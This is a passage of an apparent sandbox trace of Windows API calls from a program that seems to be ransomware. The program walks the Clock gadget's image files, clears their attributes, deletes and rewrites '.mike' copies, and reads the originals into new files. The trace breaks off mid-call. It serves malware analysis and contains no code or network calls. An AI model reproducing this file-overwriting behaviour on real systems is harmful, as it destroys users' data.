GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.056] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_settings.png", dwFileAttributes=0x80) returned 0 [0103.056] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\flower_settings.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\flower_settings.png.mike")) returned 1 [0103.059] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.065] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern.png", dwFileAttributes=0x80) returned 0 [0103.066] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\modern.png.mike")) returned 1 [0103.068] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.072] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_dot.png", dwFileAttributes=0x80) returned 0 [0103.073] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_dot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_dot.png.mike")) returned 1 [0103.075] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.079] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_h.png", dwFileAttributes=0x80) returned 0 [0103.080] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_h.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_h.png.mike")) returned 1 [0103.081] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.087] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_m.png", dwFileAttributes=0x80) returned 0 [0103.088] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_m.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_m.png.mike")) returned 1 [0103.090] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.095] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_s.png", dwFileAttributes=0x80) returned 0 [0103.095] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_s.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_s.png.mike")) returned 1 [0103.097] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.103] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_settings.png", dwFileAttributes=0x80) returned 0 [0103.104] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_settings.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_settings.png.mike")) returned 1 [0103.110] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.185] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty.png", dwFileAttributes=0x80) returned 0 [0103.185] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty.png.mike")) returned 1 [0103.187] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.191] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_dot.png", dwFileAttributes=0x80) returned 0 [0103.192] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_dot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_dot.png.mike")) returned 1 [0103.196] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.201] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_h.png", dwFileAttributes=0x80) returned 0 [0103.201] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_h.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_h.png.mike")) returned 1 [0103.203] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.210] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_m.png", dwFileAttributes=0x80) returned 0 [0103.211] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_m.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_m.png.mike")) returned 1 [0103.214] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.220] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_s.png", dwFileAttributes=0x80) returned 0 [0103.220] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_s.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_s.png.mike")) returned 1 [0103.222] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.229] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_settings.png", dwFileAttributes=0x80) returned 0 [0103.230] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_settings.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_settings.png.mike")) returned 1 [0103.232] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.235] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_bottom.png", dwFileAttributes=0x80) returned 0 [0103.236] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_bottom.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_bottom.png.mike")) returned 1 [0103.238] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_left.png", dwFileAttributes=0x80) returned 0 [0103.242] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_left.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_divider_left.png.mike")) returned 1 [0103.261] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.266] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_right.png", dwFileAttributes=0x80) returned 0 [0103.267] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_right.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_divider_right.png.mike")) returned 1 [0103.270] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.274] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_left.png", dwFileAttributes=0x80) returned 0 [0103.275] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_left.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_left.png.mike")) returned 1 [0103.279] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.282] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_right.png", dwFileAttributes=0x80) returned 0 [0103.283] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_right.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_right.png.mike")) returned 1 [0103.294] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.298] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_top.png", dwFileAttributes=0x80) returned 0 [0103.298] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_top.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_top.png.mike")) returned 1 [0103.304] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.308] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_left.png", dwFileAttributes=0x80) returned 0 [0103.309] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_left.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_bottom_left.png.mike")) returned 1 [0103.327] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.330] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_right.png", dwFileAttributes=0x80) returned 0 [0103.331] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_bottom_right.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_bottom_right.png.mike")) returned 1 [0103.341] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.344] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_left.png", dwFileAttributes=0x80) returned 0 [0103.345] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_left.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_top_left.png.mike")) returned 1 [0103.352] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.356] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_right.png", dwFileAttributes=0x80) returned 0 [0103.357] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_corner_top_right.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_corner_top_right.png.mike")) returned 1 [0103.360] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.363] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider.png", dwFileAttributes=0x80) returned 0 [0103.364] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider.png.mike")) returned 1 [0103.369] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.372] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_left.png", dwFileAttributes=0x80) returned 0 [0103.373] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_left.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider_left.png.mike")) returned 1 [0103.378] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.381] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_right.png", dwFileAttributes=0x80) returned 0 [0103.382] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_divider_right.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_divider_right.png.mike")) returned 1 [0103.384] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.388] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_disabled.png", dwFileAttributes=0x80) returned 0 [0103.389] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_disabled.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_disabled.png.mike")) returned 1 [0103.391] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.396] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_hover.png", dwFileAttributes=0x80) returned 0 [0103.396] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_hover.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_hover.png.mike")) returned 1 [0103.399] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0103.414] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0103.427] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0103.429] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike", lpFilePart=0x0) returned 0x5b [0103.429] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.430] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0103.442] GetFileType (hFile=0x288) returned 0x1 [0103.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.442] GetFileType (hFile=0x288) returned 0x1 [0103.443] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0103.443] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0103.444] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png"), fInfoLevelId=0x0, lpFileInformation=0x22de28c | out: lpFileInformation=0x22de28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82de3bb2, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x82de3bb2, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28b5345f, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x464)) returned 1 [0103.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0103.444] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", lpFilePart=0x0) returned 0x56 [0103.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0103.444] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0103.444] GetFileType (hFile=0x288) returned 0x1 [0103.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0103.444] GetFileType (hFile=0x288) returned 0x1 [0103.444] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0103.444] ReadFile (in: hFile=0x288, lpBuffer=0x22df97c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22df97c*, lpNumberOfBytesRead=0x2af080*=0x464, lpOverlapped=0x0) returned 1 [0103.446] CloseHandle (hObject=0x288) returned 1 [0103.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0103.446] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0103.446] GetFileType (hFile=0x288) returned 0x1 [0103.446] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0103.446] GetFileType (hFile=0x288) returned 0x1 [0103.446] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0103.447] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0103.447] CreateFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_left_pressed.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0103.447] GetFileType (hFile=0x288) returned 0x1 [0103.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0103.447] GetFileType (hFile=0x288) returned 0x1 [0103.448] WriteFile (in: hFile=0x288, lpBuffer=0x22e7548*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x22e7548*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.448] CloseHandle (hObject=0x288) returned 1 [0103.448] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_left_pressed.png", lpFilePart=0x0) returned 0x56 [0103.448] GetFullPathNameW (in: 